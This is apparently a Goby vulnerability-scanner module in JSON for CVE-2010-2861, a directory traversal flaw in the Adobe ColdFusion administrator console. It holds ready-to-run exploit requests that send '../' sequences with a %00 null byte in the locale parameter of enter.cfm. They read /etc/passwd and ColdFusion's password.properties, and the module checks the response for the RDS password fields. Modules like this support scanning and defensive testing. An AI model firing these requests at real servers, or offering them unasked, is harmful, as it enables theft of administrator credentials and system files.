{ "Name": "Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI CVE-2010-2861", "Level": "2", "Tags": [ "lfi" ], "GobyQuery": "app=\"Adobe-ColdFusion\"", "Description": "Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995. ColdFusion was originally designed to make it easier to connect simple HTML pages to a database. By version 2, it became a full platform that included an IDE in addition to a full scripting language.", "Product": "Adobe ColdFusion", "Homepage": "https://www.adobe.com/products/coldfusion-family.html", "Author": "", "Impact": "Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.", "Recommendation": "http://www.adobe.com/support/security/bulletins/apsb10-18.html", "References": [ "https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861", "http://www.adobe.com/support/security/bulletins/apsb10-18.html" ], "HasExp": true, "ExpParams": [ { "Name": "Filepath", "Type": "select", "Value": "../../../../../../../../../../etc/passwd%00en,../../../../../../../lib/password.properties%00en" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "rdspassword=", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "encrypted=", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/CFIDE/administrator/enter.cfm?locale={{{Filepath}}}", "follow_redirect": true, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }